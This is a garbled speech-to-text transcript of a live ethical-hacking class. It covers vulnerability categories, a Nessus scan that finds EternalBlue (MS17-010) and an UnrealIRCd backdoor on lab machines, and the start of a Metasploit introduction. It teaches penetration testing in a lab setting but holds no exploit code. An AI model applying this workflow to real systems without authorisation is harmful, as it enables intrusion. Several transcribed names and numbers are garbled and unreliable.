it's something. But you can attacker can execute any code that he wants to run on a computer. So obviously, when I say any code on a computer, every task on a computer is nothing but a code. So to perform any task like uploading, downloading files or anything like that, he has to write a code and send that code to your computer. And as soon as he sends the code, system will get automatically, system will start executing that code. As simple as that. Clear? Next category. The next category is something similar to remote code execution, but not similar to something similar to some related to RCE, but not exactly RCE. It stands for command execution. Command execution vulnerability is where an attacker is allowed to execute specific commands on the victim computer. So attacker will be able to execute specific commands on the victim computer designated for the user. Okay, which means if your computer is vulnerable with vulnerable with command execution vulnerability, okay, what I can do is I can execute few of the commands on your computer. But there's a difference between remote code execution and command execution, is because in code execution, I can write any code and I can send you. That is, if I want, I can send you code like I want to download all your files. I can write a code to delete all your files. I can write a code to get a shell or get a command line access to of your computer from my computer. I can write a code to forward to make your computer as a bot, and so that I can keep your computer as a pivotal point, and I can hack different computers through your computers. So those things I can do in remote code execution. But what could I do in command injection or command execution is that I can only run the commands that are allowed by your operating system for that specific user. So which means command execution is a limited access of only running few commands. Okay. And a remote code execution it's like a wild card. You can do anything and everything on the target machine. Clear? Next comes denial of service. Denial of service is an attack where the attacker will make a victim. Attacker will make a victim to are not able to access his computer. Which means if your computer has this DOS vulnerability, what I can do is I can make your computer stop responding to you. Which means any mouse or keyboard activity that you do will not function on a computer. Okay, it will not work. Whatever you do, it will not work. Okay, so that's what we can do. So usually DOS is done on servers so that they can take down the entire website or database, something like that. Okay, but basically it blocks the authorized user from accessing it. Here, next comes backdoor. So backdoor is technically not a vulnerability, but you can still find backdoor kind of issues in a vulnerability scanner. So what does it mean when you find a backdoor vulnerability? It means that it either means two ways. One, it means that some hacker has already compromised your machine and is running a backdoor, and is having a constant connectivity to your computer. Or in other words, it also means that you might have using some application which is already compromised by some hacker. A very best example of this would be a few version of Cam Scanner, few version of ES Explorer, few version of CCleaner. So what these two applications were is that these applications were compromised by some hacker, few version, not all. One of the version was compromised by a hacker, so that who all were using CCleaner, a specific version, those computers were in the control of the hacker. So that is what we call as backdoor. Someone has compromised the application, and through that application, he is compromising the victim. Okay. Next comes information disclosure. That is, some information on a computer is being disclosed. This information could be just your operating system. It could be username, password. It could be some private files that you have stored. It could be any file system. It could be anything that is stored on a computer. So around like 85% of your data that you see on vulnerability scanner would always be information gathering, disclosure. Okay, it could be less critical, it could be more critical as well. Yeah. So let me again recall the different categories of vulnerabilities. First, remote code execution is the most critical vulnerability. So if this vulnerability exists on the attacker machine, on the victim machine, attacker could literally execute any code on the victim machine without any authentication or authorization. Next comes command execution, where attacker will be able to execute a specific set of commands which is assigned for a specific user, for that specific designated user. Next comes DOS. DOS is a kind of vulnerability where attacker can make the system inaccessible for the user. Backdoor is technically not a vulnerability, but when you find a backdoor in a vulnerability scanner, that means either your computer was previously compromised by a hacker, and is still he still holds control on a system, or it means any of the application that you're using was hacked by a hacker, and he's controlling your computer through that application. Next comes information disclosure, which means there are some information disclosed about your computer. As simple as that, as straightforward as that. So these are the different categories of vulnerability. So this clearly this gives you a brief idea that any vulnerability that you get, you will get that vulnerability in any of these lists or any of these categories. Okay. Now coming to the tools, there are a huge set of tools across the internet and across the world, but I have tried to make some use from some finite list that is pretty much efficient, and it pretty much works in a expected fashion. Okay? The tools are so always one disk can be categorized into two categories: one, infrastructure, and web application. Which means whenever you try to identify loopholes of a computer or a server from a network perspective, we call it as infrastructure. So vulnerabilities in computers, desktop computers, laptops, or your network or your servers or databases, in terms of network connectivity, it's basically called as infrastructure. When you try to use vulnerabilities from a particular with respect to web application, if you try to identify loopholes of an application, web application, that is called as web application vulnerability scanners. So the left columns list you the web vulnerability scanners of infrastructure. The right gives you vulnerability scanners of web applications. So there are tools like Qualys Guard, Acronex, Nexpose, OpenVAS, Nessus are a few examples of infrastructure-based network scanners, vulnerability scanners. AppSpider, Acronex, HCL AppScan, OWASP, Zap, Burpsuit are example for web application vulnerability scanners. Okay, so these are the different examples. So in our current scenario, we are going to be using Nessus. This is the application that I'm going to be using for performing vulnerability scanning. So obviously, the view, the interface would be different from the one vulnerability scanner to another, except that the way you work, the response that you get, the vulnerability would be listed out. Those things would be almost similar in every vulnerability scanners. Okay, and always understand almost all the vulnerability scanners are all paid tools. The only free tool is in infrastructure is OpenVAS. Basically, it uses a Nessus engine, but it's a free tool. And in web application, OWASP Zap is a free tool. It's not the only free tool, but it's in the major category list. OWASP Zap is a free tool. Clear? So this basically defines you the theoretical items of vulnerability scanner. So before proceeding forward, if you have any queries, please punch in the queries in the chat box. In the practical context, what I'm going to do is basically, if you recall, we are working on we are pen testing on our two computers, two target missions. So we'll try to identify vulnerabilities on those two target missions. Okay, so let us see if we can find out some vulnerabilities on these two target missions. So our job now, we'll try to run vulnerability scanner and Nessus on these two computers, one Unix based mission, one Windows based mission, and see if there's any vulnerabilities on it. Clear? So let me initiate my vulnerability scanner and try to perform this vulnerability scan. So meanwhile, guys, if you have any queries, please mention the queries in the chat box. Meanwhile, so vulnerability scanner also will consume some amount of time. So meanwhile, you can punch in the queries. So in this case, I have installed Nessus. So Nessus is basically it's a vulnerability scanner. So you can download Nessus for your Windows on both your Linux machines. So in my current case scenario, I have downloaded and installed Nessus on my Kali Linux. So you can download Nessus from here. So you can download the Nessus from here. So Nessus is not a free tool; it's a paid version. So, but Nessus gives you a trial version of this. It gives you like you can download the Nessus and you can run it on your personal computer. It has few limitations. In our case, you can just download this from here first, and from the same link, you can click on activation code, which directs you to this particular URL, the page, where you can click on register now, which will give you, it will direct you to this page, where you can enter your first name, last name, and then email ID, from where you can get the access code. Okay, this will give you a trial version. So obviously it will ask for activation code. So by using registering here, you will get the free the essentials access code directly mailed to your computer. Okay, so the installation is pretty much a generic installation for your operating system. If you're using it on a Windows, you can easily download the MSI version, x64 or 32-bit, depending upon your architecture. Or if you go to Kali, you can download this Kali and install it. Okay, pretty straightforward. There's no difference in it. Yeah, so in this case, I have already downloaded and I've installed and it's completely ready to work. And Nessus is not a standalone application. It is a web-based application. So what do I mean by web-based application? It means that in order to access the application, you have to use it via a browser. So let us see that. To access Nessus, you will type https:// the IP address of the machine on which Nessus is running, :8834, which means the attack would be something like this. Nessus link, Nessus download. Let me put the download link first, so that you guys could use it. Oops, I forgot to enable. I think this is the URL. Yes, this is the URL. So the download link, and the same page you can find the activation code, and here you can put Nessus computer. Here you have to enter Nessus computer's IP, on which computer you have installed Nessus, that computer's IP, :8834 Nessus access link. Okay, in my case I have installed it on locally, so this is running on my Linux machine. Okay, so installation you can just Google out, you can identify. So it's a very basic installation, no need to worry about installation part. You just need to open up the browser and access here. We have already configured. So obviously when you run Nessus for the first time, you will get this error. The safety or security, your connection is not private. This is obvious because Nessus is using a self-signed certificate. Obviously you will get this error in that case. Okay, so just click on advanced and click on proceed to save. There's no issue in it because it's just going to communicate to you and the system. Obviously it will ask you username and password. This username and password you would have already created during registration, which is when you first time log into Nessus. That is for the first time when you're registering, while registering Nessus, you'll be asked the activation code. Just after creating activation code, you'll be prompted with your username and password to be created. You have to give your username and password. As soon as you give your username and password, you will be registered. So after that, it will do all the installation process. Once installation process is completed, you'll be welcome to the same page where you can use the previously accessed web credentials and log in here. So in this case, I've already created my account and password. So let me click on sign in directly. Okay, here I've already created an account and I've already worked on it. So that's the reason it is pretty simple and it's directly logging me. In your case, you have to install it, and during the installation process, you'll be asked for creating an account. So you utilize that username and password. So one more disclaimer here. So there is no forgot password functionality in Nessus. So please make sure you write down your username and password. In case if you missed your username and password, the only possibility is you have to uninstall Nessus and reinstall it back from scratch with a new activation code. Yeah, that's the only possibility case. Clear, guys? I hope so far it is pretty much clear. Please let me know if you have any queries. Yes, Nessus is obviously a trial version, and you can only use Nessus for a trial version per period. It's not you're talking about the teenable version or the advanced version of Nessus. So I'm not talking about the this thing. Like Nessus has various tools. So if you're using this Nessus Essential, this version, it does not have 14 days. The 14 days is for the advanced version of Nessus. So Nessus, let me show you. Nessus has multiple things in it. So the professional version of Nessus, the tunable version, the professional version of Nessus has a 14 days limitation. This does not have 14 days limitation. Instead, you can only scan 16 IPs from it. Okay, that's the only limitation. It does not have days limitation. It has limitation in terms of IPs. Yeah, the possible way is you can just uninstall it and reinstall it again to do other parts. So obviously, while practicing it, yeah, you can utilize a few IPs. Obviously, that will work on it. Okay. Second thing, yes, in Kali we can install Nessus. Yes, obviously, yes. If you have seen my current scenario, I have installed Nessus in my Kali Linux. Okay. So the Nessus currently is running on my Kali Linux itself. You can see this IP address belongs to my Kali Linux. So I've installed Nessus on my Kali Linux machine. I'm accessing that through my Windows 10 machine. Okay, as simple as that. This Nessus is a pretty latest machine. I just downloaded it in the morning. I was just setting up this in the morning. So you can see this one scan I've run already in the morning, in the afternoon probably. So yes, it's a very latest version. So whatever setting that we can I show you would be pretty much the latest. So don't need to worry or get confused in the later part. Another query. So another query: do we have a different method of generating report in Kali Nessus or same way? It's exactly same thing. So as I said, the only difference that you make here is you're running it on a Windows machine, or you're running it on a Linux machine. That's the only difference. The view, the understanding, everything remains exactly the same way. Okay, so don't need to worry about the interface. It's completely same for all the cases. Yeah. So as soon as you start installing Nessus and work for the first time, you will see completely empty over here. It will be completely empty. So since I've already run a scan just to avoid some time delay, you can find a scan over here, because Nessus will take a huge amount of time. Right? That's the reason I've already scanned here. You can just wait for a while after the scan is done so that you can get the report, right report. So let us see how can you start or initiate a new scan. Okay. For that, you need to navigate to the right top corner of your screen. That is here. You can see new scan. Click on the new scan. As I said, Nessus can do a lot of scans. So you can see a lot of scans over here. Okay, so it has a network scan, a web application, and you can also scan your mobile devices for vulnerabilities. And there are also a lot of compliance services. Obviously, when you go to an organization, you come across various compliances, and including PCI DSS, ISO 27001, a lot of all those things. So you can typically do those compliance scan even in Nessus, but unfortunately, in the trial version, you cannot do that. It says upgrade. That's because the service is only available on your paid version scan. Nevertheless, for our learning purpose, we can scan by using the basic scans. So here, as I said, in Nessus, you can also do a web application test scan as well. So you can use this scan to scan any web application or website. Okay, but here our intention is to gain access or control on our victim machine. Hence, we are going to scan via basic network scan. So what you need to do is just click on new scan and later click on basic network scan. So here in my case, I'm going to scan for the network perspective. Similarly, if you want to scan a website, you can click here. Okay, since I'm scanning a website, I'll click over here. So selected basic network scan. As soon as you scan for a basic, as soon as you select a network scan type, you'll be prompted with a configuration page where you need to configure your scan. So what you need to do is, it's not something like a complicated stuff. You just need to provide a scan name. Let me put test scan. In description, let me put a simple network scan against BMSIT test machines. Obviously, I'm not scanning BMSIT network. Obviously, I'm just portraying this as if I'm scanning a network. If you remember, I'm using this context to keep that BMSIT has given us a scenario, has given us few machines to perform pen testing, and we are doing that. So that's the scenario I'm playing out. Let me do that one. Once that description is provided, provide your target. So in this case, as I said, we have been given a network and we are scanning that, isn't it? So what you can do is you can specify the target as it is, like you can provide 43.120, comma 190.168.43.134, and you can go on, you can add commas, or else you can give a complete network range, like something like this. This is a CIDR notation of specifying the entire class C IP address of that particular target range. So this is it you need to do from scanning a network from an external perspective. You can make changes in the credentials part. You can make changes with respect to assessment. You can, if you want to scan internal to the machine, if you have credentials, you can also do that as well. But in the earlier case, I would recommend to go from scratch. Hence, this is pretty much enough for you. So just provide the scan name, description, targets, and in the drop down, you can find two options. You can either save Nessus a scan for and schedule it, or you can launch it the moment. In my case, let me click on launch. So this will initiate the scan. So first it will try to identify how many hosts or machines are up on the IP range. Next, it will try to perform port scanning in the given IP range. Then it will start to probe and identify information leakage. Next, it will go and identify if there is any vulnerability identified from the known vulnerabilities identified in the list or not. Okay, so this will take some amount of time. So that's the reason I've already initiated a single scan. So whatever target range that we did, that is 192.168.43.1, to the same scan range, I have initiated the scan. So let us see that report. So whatever I'm scanning now, I've already done the same exact scan just to avoid some time delay. So let us see that one. Okay. So in your real time, obviously you will have to wait for half an hour or 45 minutes or 1 hour or 2 hours, depending upon your network speed and bandwidth, and wait until you get this check symbol or completed symbol in the status. Clear? So to open a scan result, just click on the scan name. It will give a console where you can see what were the hosts that were scanned and what are the different numbers of vulnerabilities. You can see the vulnerabilities are displayed with respect to their colors. The colors indicate how many vulnerabilities, how many critical vulnerabilities, or what are the different severities of the vulnerability that has been identified. In case red, in this case, red indicates critical, orange high, yellow medium, green low, and blue info. You can see on 43.7, that is my Linux machine, and 43.1, that is my router, there is no critical or high vulnerability. You can find a couple of info and a couple of medium level vulnerabilities. Apart from that, nothing, right? But the more number of vulnerabilities are identified on 120 and 134, that is on my Windows 7 and my Metasploitable machine. Clear? So let us go to my Windows 7 and let us see what all information that is identified. So there's a huge list. As soon as I click on IP address, a detailed list will be visible over here. And here I can see the IP address, a MAC address, and the accurate operating system of my victim computer. Along with that, I can see a pie chart of my vulnerabilities. So you can also see there are a few vulnerabilities listed in terms of folders. You can see there are 7 part of this folder, 10 part of the folder, 4 part of the folder, and there are some individual vulnerabilities as well. Okay, so let us see one by one. I would always recommend people to start sequentially. That is, click on the first folder or vulnerability so that you can see on the top priority basis. So let me click on the very first one, which is actually a folder. And in this folder, you can see there are a lot of vulnerabilities. And if you observe, there are 4 critical vulnerabilities, 2 high vulnerability, and 1 info level vulnerability. Right? It's a very critical mission. So to see details about these particular vulnerability, what can I do? So click on the vulnerability name. As soon as you click on the particular vulnerability name, see somewhere here, you'll find the details of that vulnerability. Now, what type of details do you find here? So you'll find the vulnerability name, vulnerability description, and solution for the vulnerability, And obviously, if the vulnerability was disclosed by someone, obviously it would have some technical articles across the world, right? So it will give you the technical articles, the link towards the technical articles where you can learn and read more about this vulnerability. Some vulnerability after exploitation may give you some output. So if in case if the vulnerability is giving you out some output, it would give you that here. Most of the time it is empty, unless until it is any information disclosure. I don't know why it's freezed up. Let me retry the same URL. Sometimes Nessus gives you this issue. Pretty much awkward. Let me try. So, but basically, yes, you will get, you will find out the vulnerability name, description, and the solution for the particular vulnerability. It can be reached. What happened to this? Let me check my laptop. Okay. So my Wi-Fi is running. It's running. Here, ping 128.43.7. The machine is not pingable. Perfect. Okay, the machine is having some network issue. Machine expired. Let me try pinging from my machine 187. It's not pinging. Something fishy is going on. Okay, let me restart my network. It should do the work, do the job. Wait a minute again. Okay, so just give me a sec. Let me see if things goes out. So some network issue inside my network. It should be okay in a while. It's connected. Running or not. It's awkward. It's not pinging. 120. It's pinging here. 134 is running here. But why not 31 running? But why not 187? It was reachable. Don't know why. Just give me a sec. Config. Okay. Reachable. It's awkward. Let me reconfig. Which if I release this, it will go up. This can network and try again. Okay. It works. So no idea why it's not running. Let me okay, go down. So let me run this network manager. Give me a sec. But I will show it. Server network manager restart. That's awkward. Just give me a sec. Reconnect back to my network. And let me try it now. Ping 168.43.7 continuously. Okay, probably some issue with my system. Let me restart it. Meanwhile, let me do one thing. So better to try, to avoid time delay. So I have already downloaded my Nessus report. Just in case, let me give you out this report and let me explain the vulnerabilities via report. Meanwhile, let me restart this my computer. Meanwhile, so just give me a sec. Let me download the report over here. So don't worry, I'll be showing you the reporting structure as well. But just it's the system is confused a bit. We restart it, and then let us see the rest of the part. Okay. So power off, and that is done. It's done. Okay. So report. Okay. Where's my report? So let me show that up here. Let me download the report here. HTTPS /. So unfortunately, I'm not be able to share my Calendar screen on the Google. I mean, on this Google Meet. That's because obviously my Google Meet. I mean, we have the audio issues on my Google part. That's the reason I'm not be able to show my screen. So let me try to download this report onto my Windows machine, so that during this restarting procedure, I can explain you about this overall. I can do that. Don't do that here, right? So let me download the report here, so that everyone can easily see those report. Meanwhile, until we can explain the report, we can see how this reporting can be done and explain few more other concepts regarding the vulnerability scanner. Okay, so it's down generating the report. In a while, we'll be able to see the reporting structure. Meanwhile, guys, if you have any queries, you can punch in the queries in the chat box. That we can utilize this session for that. We will utilize this overall, utilize this particular gap in our like for the dot clarifying part. Okay, so it's almost the same method. Always you will use the same method for performing NSS generation. There's no difference in it. So it's okay. I've been utilized. I've been used to get the sessions. So I generally take sessions throughout the day. So obviously it's not a big problem. But yes, thanks for the concern as well. And yes, best mobile scanner. So as of in today's world, there is not much vulnerability scanners for mobile. That's one of the a pretty like a bad part of insecurity. But you could typically use Nessus. It's pretty good in Nessus. That is pretty much good in identifying vulnerabilities on mobile applications. Apart from Nessus, you could use there's a framework called Smartphone Pen Testing Framework. Okay, so you could typically use that one as well. So that also will help you in identifying loopholes of mobiles. So that is the best way of identifying it as well. Okay. Uh, if my system is not working, how could I download it? Good example. So I'll use another part in that case. So let me mail myself the report. Okay. So just give me a sec. Let me mail myself the report because there's no connectivity with my to my system. Okay, that's great. So yes. Oh, okay, that's okay.
Bharat, there is a request for a break.
Yeah.
So probably we'll take 5-10 minutes break.
Sure, sir. I'll do the same. We'll do the same thing. Meanwhile, the system
Yeah,
is not
even
working.
yeah, you can restart the system and take a break. So
Yeah.
what will be back?
It's 9th for 4:33 here. We'll take a 10 minutes break. Is that okay?
4:45 will be back.
Yes.
Is it
Yeah,
is
that'll
it
be
good?
perfect. Yeah, that'll be
Yeah,
perfect.
yeah.
Thank you. Hi, sir. Should we start? Yes, sir. Am I audible?
Yeah, Bharat, you can start. We can start.
Okay, let me share the screen. So I hope my screen is visible to everyone, guys. Yeah.
It's loading now. I think it should be visible.
Is it visible now, ma'am?
Yeah, it's fine.
Yeah, perfect. So my Nessus is loading a bit. It's almost done. Hope it will be completed in a sec. Loading. So as I said, Nessus, since it's a web-based console, it will take some time for its modules and all the plugins to get load. In the earlier case, since I've restarted my computer, usually the Nessus service will also be restarted. Hence, this compiling plugins, it would be generally prompted. Meanwhile, let us also see one format of report. So we'll discuss about the report, where contains the same content whatever we are able to see on the scan. Not visible. We can see the same thing on a report as well. So meanwhile, let me first show you how to generate a report. Then we'll work on this as well. Perfect. So you can see the new scan also got completed. Before the break, we had already done a scan and we were already in the mid of understanding a few vulnerabilities. We technically were in mid of this vulnerability, right? So previously, we have discussed that this is vulnerability name and the description of the vulnerability, the solution for the vulnerability, and the port. The port, obviously, as I said, port acts as a major part. Hence, it would also tell you which port is the one which is affected with that particular vulnerability. This is about the vulnerability part. In the right side, it gives you lot more helpful information, which is helpful for the pen testers. That is, on the right top corner, it gives you risk information about how riskier this application is. Obviously, this is completely handled by CISO guys, so not much things that need to be worked on it. So, as a pen tester or the associate level, you need to work on from this part for majorly for hackers. So here, the vulnerability information category or the part will give us so when this vulnerability was identified, right? So here you can see that when the vulnerability was published. Okay, this vulnerability, which we are saying was published on March 14th, 2019, right? And this vulnerability was fixed. The patch for this vulnerability was published on the same day. So what Microsoft does is it does not reveal a vulnerability unless until it has found it has found a kind of an patch for it. Unless until it finds a patch, it will not never disclose it. That's the thing in Microsoft, right? So almost all the Microsoft vulnerabilities would be the patch and vulnerability would be on the same day. One exploit available true defines that this vulnerability there are exploit scripts. The scripts are available to exploit this vulnerability, to break this vulnerability. And the second tab, that is exploitable with tab. This tab clearly tells us that with which using which tool you can exploit this vulnerability and gain access. Okay, so currently for this vulnerability, you could use Metasploit or Core Impact to gain control of this vulnerability. Yeah, as simple as that. So this is our first one vulnerability. I can see that even this is a RCE vulnerability, which means it's a remote code execution category of vulnerability. Yeah. So almost if I go to another vulnerability, let me go to this vulnerability. Again, I'm going to just sketching the surface. You can go through all the details part when you are practicing. And obviously, if you get any issues, you can get back to us through email or you can contact Light, through which they will redirect the queries to us. Right? So even here as well, it defines you the vulnerability code. So, so this organization would have some identifying code. Like so, similarly, what we have biological code, like code for the biological viruses or biological infections. So similarly, you will have a vulnerability code even for the digital infections or vulnerabilities. So this MS17-010, or if in the bottom, if you see, there are various wide range of codes, right? CV 2017-0143. These are all vulnerability codes that is assigned for this particular vulnerability. Okay, just to identify and track this vulnerability. Okay. Next comes your obviously first it gives you the vulnerability name. Next it gives you a description of that particular vulnerability. Detailedly explains you what this vulnerability is about. Next, in solution, it gives you what is a solution for this vulnerability. Excuse me. Excuse me. The solution part will tell you the solution of this particular the patch for this vulnerability. Then, as usual, you get the technical articles. You scroll down, you see a port which is responsible for this vulnerability. On the right side, you will see when this vulnerability was published, when it got patched, the patch was published, using which tools you can go and exploit this vulnerability, and what were the vulnerability codes assigned for this vulnerability. Okay, so all the vulnerabilities will have a similar fashion, even if you go to mid I and all. So every vulnerability will be having vulnerability name, and then vulnerability code, and if you have any information leakage, let's say in this case, have identified, let's say, Windows, let's say remote host net BIOS information. So here it has informed, it was disclosed the system information. Like in this case, so when during information, it will tell you what information is being leaked. If the vulnerability is exploitable, it will give you the that exploitable part, and it will give you which version or what is being disclosed. This kind of information will be displayed. So each and every vulnerability, it will tell you what vulnerability name, the description, what is the solution, some technical articles, and if the vulnerability can be exploited, it will tell you using which tool you can exploit and what is the vulnerability code for that. Yeah, pretty simple and straightforward. Right? Now coming to the report part, we'll have a similar fashion even for 134 as well. Here it will tell that what vulnerability we have. So like in this case, it says Unreal backdoor detection. So it has identified a backdoor in IRC. See, IRC. And it is saying that it can be hacked using Metasploit. Right? So it has identified a backdoor in Unreal IRCD. And it has identified Unix operating system has a vulnerability. Identified. Similarly, it has identified default password of VNC server. Okay. So, and apart from this, it has identified multiple issues on a web server, unconfigured default installation directory, all those things, right? So the basic concept of vulnerability scanner, it will obviously, the format would be exactly same for everything, right? So first, as soon as you open up a vulnerability, it would give you first vulnerability name and description, solution for it, and then which port was responsible for it, and using which tool you can go and exploit it. Simple and straightforward. Okay, so we have identified two vulnerabilities. One in Windows, we have vulnerability in MS17F1010, a blue kind of vulnerability in SMB. In Linux, you have two backdoors in real IRCD and on port number 6669. So let us make a note of this. So in Windows, let us see, let me put this way, vulnerable to, let us put the code. So code will be the best way to identify or to search for the exploit scripts on port 445 for Windows. And next mission is vulnerable to Unreal IRCD on port number 667. So let's confirm it. It's the same port or not? Yeah, it's the same port. And so version is Unreal 3.2.8. Let's use that for searching the script. Yeah. So Unreal. So these are the two different vulnerabilities that we have got. Both are remote code execution vulnerability, right? So if you observe, even this is a remote code execution. It's basically a backdoor. Someone has already installed a backdoor into that application. And in this case, it is a remote code execution. You can say it's a remote code execution, one arbitrary code execution. You can execute any code that you want. And the vulnerability code is available over here. Okay, so that means so far we have identified critical vulnerabilities on both a Windows machine and our Metasploit machine, isn't it? So that is about the vulnerability part. Let us see how can you generate a report for this case. To generate report, make sure you come to the basic, I mean the home page of the scan. On the right top corner, click on report. So previously the report and export were bound to a single tab, but now they have differentiated. So click on report tab, under which you need to click on PDF. Obviously, everyone supports reports on PDF. So in case if you want to export this into any other tool, in that case, you can use CSV or XML, HTML. But to present it, we always prefer to use PDF. So obviously, you can use PDF. Make sure you generate a report in custom format, because in executive format, it will only give you it will only give you some like basic hints. It does not give you the report in detailed format. Okay, so you can just click on custom and make sure everything is left default and just click on generate report. So what this will do is it will create a nice looking PDF document and it will document all your findings and create a nice looking PDF file that displays you to the complete vulnerability list for all the vulnerabilities that has been identified. Okay, this will take some amount of time, so we'll wait for a while. It should be available in a moment. So nevertheless, I've already generated a report. You can use the same thing, the same exact report. So you can see it's a 392 pages report, right? It's a pretty huge book. You can see whatever name that we've given, and since it's a free version, there will be a watermark over here. You can remove that by giving the purchased version. There will be various vulnerabilities by host. So host would be like sequentially, you can see file got downloaded. So the list of IP address and remedies would be available over here. You can just scroll down to each IP address and see what vulnerabilities. Let's say, so let me drive to critical vulnerabilities. Just scrolling down to Windows machine. Let me find the critical vulnerability so that I can give you enough information. So let me search for the word MS 17. Here it is. On page number 71. Okay. So here it is. So even here, the concept will be same. You first find the synopsis, the name of a vulnerability, the description of the vulnerability, technical articles of the vulnerability, finally solution for the particular vulnerability, okay, risk score, and reference IDs, which you can use for status and tracking purpose, and using which tool you can go and exploit this vulnerability. Finally, which was a port that was responsible for this vulnerability. As simple and straightforward. Clear? Any queries, guys, so far? This is how we can identify a vulnerability, and this is how we can create a nice looking report with the help of a vulnerability scanner. Any queries so far, guys? So the queries goes like this. A couple of queries. It means that. Okay, perfect. So which vulnerabilities cannot be tested by vulnerability scanners? So the vulnerability scanners have its own limitations. So we are using a tools, right? So the tool is a tool, obviously, as long as it is. So it does not depend. It will have a wide set of vulnerability that cannot be defined. It cannot be identified. So if you recall, the machine that we're using is Metasploitable 2. It has different vulnerabilities that is not identified here. Like let me open up here. So this VSFTPD has a backdoor in it, right? But your Metasploit cannot identify this. Okay, this has remote code execution vulnerability. Even VSFTPD version has a remote code execution vulnerability, which is not defined, which is not identified in Nessus. Similarly, even ProFTPD, the ProFTPD, even this one has a remote code execution vulnerability, which is not identified by Nessus. So the concept here is your vulnerability scanner may miss out certain vulnerabilities. So that's the case in real world. If you want to have an efficient vulnerability scanner, in that case, you should use more than one, multiple or different vendors vulnerability scanner to have efficient vulnerabilities and efficient vulnerabilities. So obviously, the vulnerability scanner will miss few of the other vulnerabilities in its scanning method. Clear? Another query goes like this: is which vulnerabilities are exploited by ransomware? So basically, a ransomware is a malware. So going back to our which attack with the WannaCry ransomware, which happened on our 2017. You see, the vulnerability that we're going to exploit is basically the root cause of the WannaCry ransomware. But if you, frankly speaking, WannaCry doesn't, well, any ransomware does not utilize a vulnerability by default. So ransomwares are always a malware. In general world, ransomware is a malware created by the hacker. He will send it to the victim, and as soon as the victim runs that particular malware, his system will get infected with that. In this case, in his system, so the victim system will get infected. In this case, in terms of ransomware, the victim system's data will be logged by the hacker and ask for the ransom. So ransomwares are basically independent. So as I said, the user has to run this malware, isn't it? So now to prevent that, the ransomware would be a part of a code, and hackers will use any type of remote code execution or command execution kind of vulnerability, and I'll bound this ransomware into that particular exploit, and they will move, and then they will send that exploit to the victim. Because see, remote code execution means you can execute any code, isn't it? So what hackers will do, they will take the help of remote code execution to deliver the malwares. So most of the ransomwares that is automatically ran on particular computers are delivered through remote code execution vulnerability. And it was the same thing that happened even in 2017, around like May 14th, if I'm not wrong. The WannaCry ransomware, they used MS17010 vulnerability, that is eternal blue vulnerability, which is actually a remote code execution vulnerability, to deliver the WannaCry ransomware. Yeah, I hope so far it is pretty much clear, and I hope all the queries asked so far is pretty much clear. If you feel any of your queries are left unanswered, please let me know that. And if you have any other queries, please let me know that in the chat box as well. Okay, so this completes us with the completion of information gathering. So far we have various information about our victim, saying that we have port scan details, we have accurate operating system, we have accurate services running, we have information leakages in different cases. So there are a wide range of information that we have currently regarding a target. But what is our intention? So our intention was to find a way how I can gain control on these two missions, which means my intention is to find out a remote code execution vulnerability and utilize that remote code execution vulnerability and gain access to the victim computer. As simple and straightforward as that. So I already have found out a remote code execution vulnerability, isn't it? So the MS17010 code, which is basically named as Eternal Blue vulnerability, is basically a remote code execution vulnerability, which means utilizing this particular vulnerability, I can gain control over my victim computer. Yeah. So now I know my victim computer is as simple and straightforward as it is. Okay. So come on, let's power up my Kalanas mission and then try to gain control over my victim computer. Yeah. So for this, the words are exploitation phase. Okay, so we have done port scanning, we have done vulnerability scanning, and after performing vulnerability scanning, we have known vulnerabilities on our victim computer. So let us utilize that known vulnerability and gain access to our victim computer. Clear? As simple and as straightforward as this. So the tool which I'm going to be using now is basically called as Metasploit. Now this Metasploit is as famous and pretty much more famous even than typical Nmap as well, because Metasploit is one of the famous exploitation tool. So whenever you want to whenever you want to exploit a vulnerability and gain control over someone's computer, Metasploit is one of the commonly used tool for that purpose. Okay, so it is basically not just a small tool. Instead, it is a pretty much bigger framework. It is actually a framework. So it is built on Ruby language, and it comes up pre-installed in almost every hacking-based distribution. That is, every hacking-based operating system, you can find Metasploit in it. Okay, so this is a wide, well-equipped tool, and when you're going for hacking, majorly if you are in a, if you are trying to go, arsenal that you need. This is one of the tools that you need to keep in your arsenal on your backpack, right? So it's a pretty it's a pretty bigger tool. It's something like an ocean, right? So again, as I said, as usually, this is a big ocean, and we'll be just like covering up one glass of water from the ocean, right? So I'll try to give you some basics, and I'll try to introduce towards Metasploit. But trust me, Metasploit gives you a complete joy of hacking. So if you want to learn hacking in the way how it is shown in movies, right? So I said the same thing yesterday. So hacking is not like shown in movies. Just by clicking few keystrokes, you cannot compromise missions, right? But you can get some reality of that kind of exploitation with the help of tools like Metasploit. Okay, it comes up with a big bundle of all the exploits, like more than 2,000 plus exploits it comes up with, where you can compromise such huge amount of vulnerabilities and gain control over victim computers. Okay, so without wasting much time, let us get into Metasploit. So to give some idea, Metasploit so let me power up Metasploit. So before powering up Metasploit, there are a few dependencies for it. So it's a framework, it's not just a tool. So hence, since for the first time when you run up Metasploit, you need to use this tool called msfdb space init. So this will initialize your Metasploit database. As I said, it contains at least 5,000 to 6,000 of scripts. Okay, Metasploit is purely a command line interface tool. It is not a GUI tool, which means everything that you do will be written on commands. Okay, and all the scripts, you basically how this Metasploit works in sense, it will first we need to, it's as similar to launching a missile. First, you need to import a script. Next, you need to configure the script, and then you need to shoot it towards your target, as similar to shooting up a missile. First, we need to import the script, configure the script, and run that script. So as I said, the scripts, there are like 5,000 of scripts. You cannot remember the path of each and every script, isn't it? That's the reason we are going to use a database functionality like search, all those functionality. So hence, it's pretty much necessary for us to first initialize the database by using msfdb space init. Next, start the underlying database by using command like service space postgresql start. The first command will initialize the database. The second command will start the database service. After that, we will start the Metasploit by using msf console. You can see my current terminal is pointing towards my root directory. The moment I hit enter, it will take me inside a Metasploit framework. Okay, so let us get inside. As I said, Metasploit, so it will take some time because obviously it's a framework. It needs a lot of importing part. So as I said, Metasploit has various scripts. So the current Metasploit, the version 5 of Metasploit, contains 5 category of scripts. But to a bit of history, Metasploit was created as an exploitation framework because of its popularity, and people started using it so officially, so repeatedly that it became one of the famous and most commonly used hacking tool. Hence, people started to build other than exploitation scripts also on Metasploit itself. So people started to build vulnerability scripts, vulnerability scanning scripts. People started to build port scanning scripts on Metasploit itself. So in today's world, you can not only run exploitation scripts on Metasploit, you can also run port scanning. You can also perform port scanning. You can also perform vulnerability scanning. You can also perform password cracking. You can also perform like a fuzzing, brute force things, or all those things on Metasploit itself. So hence, Metasploit contains different types of scripts. As you can see, the current version 5.0 contains 7 category of scripts. The first category is used for exploiting a particular vulnerability. Auxiliary scripts. So as I said, Butterspec was used for exploitation framework, 